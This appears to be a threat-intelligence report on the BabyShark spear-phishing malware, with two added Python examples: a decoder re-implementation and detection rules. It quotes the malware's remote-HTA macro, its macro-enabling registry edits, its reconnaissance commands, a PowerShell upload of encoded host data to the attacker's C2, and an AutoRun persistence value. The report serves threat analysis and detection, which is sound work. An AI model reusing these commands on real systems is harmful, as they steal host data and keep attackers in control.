
In February 2019, Palo Alto Networks Unit 42 researchers identified spear phishing emails sent in November 2018 containing new malware that shares infrastructure with playbooks associated with North Korean campaigns. The spear phishing emails were written to appear as though they were sent from a nuclear security expert who currently works as a consultant for in the U.S. The emails were sent using a public email address with the expert’s name and had a subject referencing North Korea’s nuclear issues. The emails had a malicious Excel macro document attached, which when executed led to a new Microsoft Visual Basic (VB) script-based malware family which we are dubbing “BabyShark”.

BabyShark is a relatively new malware. The earliest sample we found from open source repositories and our internal data sets was seen in November 2018. The malware is launched by executing the first stage HTA from a remote location, so it can be delivered via different file types, including PE files as well as malicious documents. It exfiltrates system information to a C2 server, maintains persistence on the system, and waits for further instruction from the operator. Figure 1, below, shows the flow of execution.

Figure 1 BabyShark execution flow

Unit 42 was able to determine the phishing emails targeted at least:

A university in the U.S. which was to hold a conference about the North Korea denuclearization issue at the time

A research institute based in the U.S. which serves as a think tank for national security issues, and where the previously referenced nuclear expert currently works.

Expanding our search to public repository samples, we identified additional malicious document samples delivering BabyShark. The original file names and decoy contents of these samples suggested that the threat actor might have interests in gathering intelligence related to not only North Korea, but possibly wider in the Northeast Asia region.

During the investigation, we were able to find links to other suspected North Korean activities in the past; KimJongRAT and STOLEN PENCIL.

Malicious Documents

BabyShark is a relatively new malware. The first sample we observed is from November 2018. The decoy contents of all malicious documents delivering BabyShark were written in English and were related to Northeast Asia’s regional security issues.

Figure 2 Timeline of BabyShark malicious documents and filename / decoys

While some decoys used content which is publicly available information on the internet, some used content which appears to not be public. Inspecting the metadata of the documents with this non-public content, we suspect that the threat actor likely compromised someone with access to private documents at a U.S. national security think tank.

Figure 3 Decoy content copied from the internet

Figure 4 Decoy content not publicly available on the internet (intentionally obfuscated)

The malicious documents contain a simple macro which would load the BabyShark’s first stage HTA at a remote location.

Sub AutoOpen()
    Shell ("mshta https://tdalpacafarm[.]com/files/kr/contents/Vkggy0.hta")
End Sub

BabyShark Malware Analysis

Analyzed sample details:

SHA256:       9d842c9c269345cd3b2a9ce7d338a03ffbf3765661f1ee6d5e178f40d409c3f8
Create Date:  2018:12:31 02:40:00Z
Modify Date:  2019:01:10 06:54:00Z
Filename:     Oct_Bld_full_view.docm

Table 1 Analyzed sample details

The sample is a Word document which contains a malicious macro loading BabyShark by executing the first stage HTA file at a remote location below:

https://tdalpacafarm[.]com/files/kr/contents/Vkggy0.hta

After successfully loading the first stage HTA, it sends out an HTTP GET request to another location on the same C2 server, then decodes the response content with the following decoder function.

' d (the column width) is assigned elsewhere in the script; the value is not shown here.
Function Co00(c)
    L=Len(c)
    s=""
    ' Walk a d-column, row-major layout of c column by column
    ' (this undoes a simple columnar transposition of the response)
    For jx=0 To d-1
        For ix=0 To Int(L/d)-1
            s=s&Mid(c,ix*d+jx+1,1)
        Next
    Next
    ' Append the trailing characters that did not fill a complete row
    s=s&Right(c,L-Int(L/d)*d)
    Co00=s
End Function
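A Python re-implementation of the Co00 decoder above, together with the matching encoder, as an added example that is not code from the original post or from the malware. The VBScript takes d (the column width) from elsewhere in the script and the post does not show its value, so d is assumed here as an explicit parameter.

```python
# Python mirror of BabyShark's Co00() decoder (added example, not from the post).
# The VBScript treats the C2 response as rows of width d and reads it column by
# column, then appends the leftover tail, i.e. it undoes a columnar transposition.
# d is set elsewhere in the malware's script (value not shown in the post), so it
# is an explicit parameter here.

def co00_decode(c: str, d: int) -> str:
    """Mirror of Co00(c): read column-wise over a d-wide row-major layout."""
    length = len(c)
    rows = length // d                 # Int(L/d)
    out = []
    for jx in range(d):                # For jx=0 To d-1
        for ix in range(rows):         # For ix=0 To Int(L/d)-1
            out.append(c[ix * d + jx])  # Mid(c, ix*d+jx+1, 1) is 1-based
    out.append(c[rows * d:])           # Right(c, L - Int(L/d)*d)
    return "".join(out)


def co00_encode(plain: str, d: int) -> str:
    """Inverse of co00_decode() (not in the post): build the wire form that the
    decoder turns back into `plain`, useful for confirming the analysis."""
    rows = len(plain) // d
    body, tail = plain[: rows * d], plain[rows * d:]
    # The decoder emits body column-by-column from a rows x d grid; fill that
    # grid in the same order so that reading it row-major yields the encoding.
    grid = [[""] * d for _ in range(rows)]
    k = 0
    for jx in range(d):
        for ix in range(rows):
            grid[ix][jx] = body[k]
            k += 1
    return "".join("".join(row) for row in grid) + tail


if __name__ == "__main__":
    wire = co00_encode("hello world", 3)   # constructed sample, d=3
    print(wire, "->", co00_decode(wire, 3))
```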

The decoded BabyShark VB script first enables all future macros for Microsoft Word and Excel by adding the following registry keys:

HKCU\Software\Microsoft\Office\14.0\Excel\Security\VBAWarnings, value:1

HKCU\Software\Microsoft\Office\15.0\Excel\Security\VBAWarnings, value:1

HKCU\Software\Microsoft\Office\16.0\Excel\Security\VBAWarnings, value:1

HKCU\Software\Microsoft\Office\14.0\WORD\Security\VBAWarnings, value:1

HKCU\Software\Microsoft\Office\15.0\WORD\Security\VBAWarnings, value:1

HKCU\Software\Microsoft\Office\16.0\WORD\Security\VBAWarnings, value:1

It then issues a sequence of Windows commands and saves the results in %AppData%\Microsoft\ttmp.log.

whoami
hostname
ipconfig /all
net user
dir "%programfiles%"
dir "%programfiles% (x86)"
dir "%programdata%\Microsoft\Windows\Start Menu"
dir "%programdata%\Microsoft\Windows\Start Menu\Programs"
dir "%appdata%\Microsoft\Windows\Recent"
tasklist
ver
set
reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default"

The collected data is encoded using the Windows certutil.exe tool, then uploaded to the C2 via an HTTP POST request.

retu=wShell.run("certutil -f -encode """&ttmp&""" """&ttmp1&"""",0,true)
retu=wShell.run("powershell.exe (New-Object System.Net.WebClient).UploadFile('https://tdalpacafarm[.]com/files/kr/contents/upload.php','"&ttmp1&"');del """&ttmp1&""";del """&ttmp&"""",0,true)

BabyShark adds the following registry key value to maintain persistence and waits for further commands from the operator. Unfortunately, we were not able to collect additional commands issued by the operator.

HKCU\Software\Microsoft\Command Processor\AutoRun, value: “powershell.exe mshta https://tdalpacafarm[.]com/files/kr/contents/Usoro.hta”

This registry key executes the string value when cmd.exe is launched. BabyShark ensures cmd.exe is launched by registering the following scripts as scheduled tasks:

[%AppData%\Microsoft\Axz\zvftz.vbs]
Set wShell=CreateObject("WScript.Shell"):retu=wShell.run("cmd.exe /c taskkill /im cmd.exe",0,true)

[%AppData%\Adobe\Gqe\urjlt.js]
wShell=new ActiveXObject("WScript.Shell");retu=wShell.run("cmd.exe /c taskkill /im cmd.exe",0,true);
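Detection logic for the host artifacts described in this section and the previous one, as an added example that is not code from the original post. It runs six pattern rules over constructed process-creation and registry-set lines; the log format, the parent process names and the encoded file name ttmp.enc are assumptions, while the C2 URLs and registry paths are the ones quoted above.

```python
import re

# Detection rules for the BabyShark host artifacts documented in the post
# (added example, not from the post): mshta pulling a remote HTA, VBAWarnings
# forced to 1, certutil encoding the collected data, the PowerShell WebClient
# upload, the Command Processor AutoRun value, and a script host killing cmd.exe.
RULES = [
    ("mshta loading a remote HTA",
     re.compile(r"\bmshta(\.exe)?\b.*https?://\S+\.hta\b", re.I)),
    ("certutil encoding a file for exfiltration",
     re.compile(r"\bcertutil(\.exe)?\b.*\s-encode\b", re.I)),
    ("PowerShell WebClient.UploadFile",
     re.compile(r"\bpowershell(\.exe)?\b.*WebClient\)?\.UploadFile\(", re.I)),
    ("script host killing cmd.exe (AutoRun trigger)",
     re.compile(r"\b[wc]script(\.exe)?\b.*taskkill\s+/im\s+cmd\.exe", re.I)),
    ("Command Processor AutoRun pointing at a script host",
     re.compile(r"Command Processor\\AutoRun\b.*\b(mshta|powershell|[wc]script)\b", re.I)),
    ("Office VBAWarnings set to 1 (all macros enabled)",
     re.compile(r"\\Office\\\d+\.\d+\\(Excel|Word)\\Security\\VBAWarnings\b\D*1\s*$", re.I)),
]

# Constructed sample telemetry (not real log data) in a simplified
# "<event>: <parent> -> <command>" or "<event>: <key> = <value>" form.
# ttmp.enc is an assumed name for the certutil output. Last two lines are benign controls.
SAMPLE_LOG = [
    "ProcessCreate: WINWORD.EXE -> mshta https://tdalpacafarm[.]com/files/kr/contents/Vkggy0.hta",
    "RegSet: HKCU\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\VBAWarnings = 1",
    "ProcessCreate: mshta.exe -> certutil -f -encode %AppData%\\Microsoft\\ttmp.log %AppData%\\Microsoft\\ttmp.enc",
    "ProcessCreate: mshta.exe -> powershell.exe (New-Object System.Net.WebClient).UploadFile('https://tdalpacafarm[.]com/files/kr/contents/upload.php','%AppData%\\Microsoft\\ttmp.enc')",
    "RegSet: HKCU\\Software\\Microsoft\\Command Processor\\AutoRun = powershell.exe mshta https://tdalpacafarm[.]com/files/kr/contents/Usoro.hta",
    "ProcessCreate: wscript.exe -> cmd.exe /c taskkill /im cmd.exe",
    "ProcessCreate: explorer.exe -> certutil -verify signed.exe",
    "RegSet: HKCU\\Software\\Microsoft\\Office\\16.0\\Word\\Security\\VBAWarnings = 2",
]


def scan(lines):
    """Return (rule name, offending line) pairs; one line may trip several rules."""
    hits = []
    for line in lines:
        for name, rx in RULES:
            if rx.search(line):
                hits.append((name, line))
    return hits


if __name__ == "__main__":
    for name, line in scan(SAMPLE_LOG):
        print(f"[{name}] {line}")
```

The AutoRun line trips two rules (the AutoRun rule and the remote-HTA rule), which is the intended overlap: either artifact on its own is worth a look.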

Links to Other Activity

We noticed BabyShark having connections with other suspected North Korean activities in the past; KimJongRAT and STOLEN PENCIL.

KimJongRAT connection:

BabyShark and KimJongRAT use the same file path for storing collected system information: %AppData%\Microsoft\ttmp.log.

KimJongRAT had similar interests in targeting national security related targets. The malware was delivered with the following decoys:

Decoy Filename: Kendall-AFA 2014 Conference-17Sept14.pdf
Dropper SHA256: c4547c917d8a9e027191d99239843d511328f9ec6278009d83b3b2b8349011a0

Decoy Filename: U.S. Nuclear Deterrence.pdf
Dropper SHA256: 1ad53f5ff0a782fec3bce952035bc856dd940899662f9326e01cb24af4de413d

Decoy Filename: 제30차한미안보 안내장 ENKO.fdp.etadpU.scr (translates to "30th Korea-U.S. National Security Invitation Update")
Dropper SHA256: b3e85c569e89b6d409841463acb311839356c950d9eb64b9687ddc6a71d1b01b

Decoy Filename: Conference Information_2010 IFANS Conference on Global Affairs (1001).pdf
Dropper SHA256: 0c8f17b2130addebcb2ca75bd7a982e37ddcc49d49e79fe60e3fda767f2ec972

Table 2 Decoy filename used when delivering KimJongRAT

The threat actor behind the BabyShark malware frequently tested its samples for anti-virus detection when developing the malware. The testing samples included a freshly compiled KimJongRAT.

SHA256:                52b898adaaf2da71c5ad6b3dfd3ecf64623bedf505eae51f9769918dbfb6b731
Size:                  685,568 bytes
Compile Date:          2019-01-04 05:44:31
AV Test Site Upload:   2019-01-04 08:15:41

Table 3 Freshly compiled testing KimJongRAT sample

STOLEN PENCIL connection:

A freshly compiled testing version of a PE type BabyShark loader was uploaded to a public sample repository. The sample was signed with the stolen codesigning certificate used in the STOLEN PENCIL campaign. We did not notice any other malware being signed with this certificate.

SHA256:                6f76a8e16908ba2d576cf0e8cdb70114dcb70e0f7223be10aab3a728dc65c41c
Size:                  32,912 bytes
Compile Date:          2018-12-21 00:34:35
AV Test Site Upload:   2018-12-21 08:30:28

Table 4 Signed testing version of PE type BabyShark loader sample

Figure 5 Codesign details

Conclusion

BabyShark is being used in a limited spear phishing campaign which started in November 2018 and is still ongoing. The threat actor behind it has a clear focus on gathering intelligence related to Northeast Asia's national security issues. Well-crafted spear phishing emails and decoys suggest that the threat actor is well aware of the targets, and also closely monitors related community events to gather the latest intelligence. While not conclusive, we suspect that the threat actor behind BabyShark is likely connected to the same actor who used the KimJongRAT malware family, and at least shares resources with the threat actor responsible for the STOLEN PENCIL campaign. We also noticed testing indicating the attackers are working on a PE loader for BabyShark. The threat actor may use different methods to deliver BabyShark in future campaigns.

Palo Alto Networks customers are protected from this threat in the following ways:

WildFire and Traps detect all the malware described in this report as malicious.

C2 domains used by the attackers are blocked via Threat Prevention.

AutoFocus customers can monitor ongoing activity from the threats discussed in this report by looking at the following tag:

Palo Alto Networks has shared our findings, including file samples and indicators of compromise, in this report with our fellow Cyber Threat Alliance members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. For more information on the Cyber Threat Alliance, visit cyberthreatalliance.org.

Indicators of Compromise

Malicious Documents:


PE version loader, signed with stolen certificate:

6f76a8e16908ba2d576cf0e8cdb70114dcb70e0f7223be10aab3a728dc65c41c